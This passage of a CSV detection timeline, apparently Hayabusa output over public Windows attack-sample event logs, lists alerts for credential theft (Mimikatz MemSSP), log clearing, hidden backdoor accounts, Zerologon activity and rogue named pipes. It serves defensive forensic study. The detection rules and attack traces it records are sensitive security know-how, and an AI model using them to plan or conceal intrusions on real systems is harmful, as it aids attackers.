+09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:13.713 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 
00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:02:16.084 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | 
User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx
2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,../hayabusa-rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx
2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-14 23:44:14.393 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-14 23:46:33.690 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-14 23:48:28.683 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx
2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
2020-09-21 06:22:24.799 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx
2020-09-24 01:49:26.469 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.703 +09:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:27.599 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:45.506 +09:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:51:27.552 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-27 22:19:54.244 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.250 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.257 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.264 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.272 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.286 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.293 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.299 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
